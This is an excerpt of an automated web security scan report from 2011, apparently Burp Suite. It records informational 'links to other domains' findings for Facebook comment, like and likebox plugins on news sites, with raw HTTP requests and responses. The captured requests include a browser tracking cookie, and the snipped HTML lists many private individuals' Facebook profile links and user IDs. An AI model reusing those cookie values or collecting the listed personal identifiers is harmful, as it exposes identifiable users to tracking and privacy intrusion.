<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173502_737416661_8112487_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603284_10150196649149441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:39" data-date="Sun, 08 May 2011 03:39:37 -0700">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/say.astra" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187093_701305855_6979760_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/garethlfc" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211611_587822251_51947_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16621487_10150197538854441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Monday, 09 May 2011 at 02:48" data-date="Mon, 09 May 2011 02:48:04 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/tigerbloodpromotions" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186530_722933461_7910700_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Leeds/107709815923527" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16608834_10150196939404441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 10:41" data-date="Sun, 08 May 2011 10:41:25 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/harryquigley" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174398_1206258077_375414_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603298_10150196649749441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:41" data-date="Sun, 08 May 2011 03:41:03 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603447_10150196657509441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:58" data-date="Sun, 08 May 2011 03:58:34 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202893_827230590_1037785_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16607783_10150196889979441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 09:38" data-date="Sun, 08 May 2011 09:38:22 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/kishanthecripsterb" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187150_786775023_7546009_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16604129_10150196694994441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 05:14" data-date="Sun, 08 May 2011 05:14:53 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187730_100000480701200_6185505_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Taichung-Taiwan/110922325599480" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603269_10150196648594441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:38" data-date="Sun, 08 May 2011 03:38:11 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

15.37. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

15.38. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/irishtimestheticket" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195710_161783523837208_5711127_q.jpg" alt="The Ticket" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186056_100000820600910_109272_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=579882707" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49935_579882707_7608281_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001501952058" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23164_704176579_7818_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48980_609631595_8142_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1026990194" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49056_1026990194_1318_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186923_549675944_4140389_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195419_590219482_2622940_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=650790498" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49887_650790498_7812758_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000756077185" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23070_100000756077185_6442_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

15.39. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/nmemagazine" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/188057_9577714166_7953271_q.jpg" alt="NME Magazine" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203034_502474779_5408026_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/giancarlo.catucci" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173266_612917902_498390_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sinziana.boaru" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195627_1254209248_300618_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=524260038" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203266_524260038_7691922_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000527649467" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186959_100000527649467_241812_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1627505639" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195503_1627505639_5184381_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/je.everyme" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161098_1342374995_8016928_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sindum" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211292_775320136_3836729_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1359173429" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48977_1359173429_9520_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186038_661437099_2872173_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/AydinMAI68" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186643_100002173506333_2964858_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=56502224" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187443_56502224_3218985_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1310354027" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174098_1310354027_2873640_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/emreerbirer" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187140_100001144540097_3026451_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1094941774" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186064_1094941774_2246234_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=621947716" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187517_621947716_694488_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1012820442" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187090_1012820442_3696599_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1407013060" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187175_1407013060_4564630_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1030523268" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186187_1030523268_5039732_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000232136679" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41654_100000232136679_2814536_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/saveugandan.children" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161271_100001473310108_1002552_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1108593468" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161259_1108593468_4611679_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187591_100001316685403_3643929_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=586715048" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23093_586715048_772_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1684804485" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161721_1684804485_1928683_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ingrid.tegtmeier" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211338_505753734_1736542_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203280_575035348_5750338_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002357476036" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187522_100002357476036_5717414_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wongmingto" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203196_635357894_3340613_q.jpg" /><div class="name">
...[SNIP]...
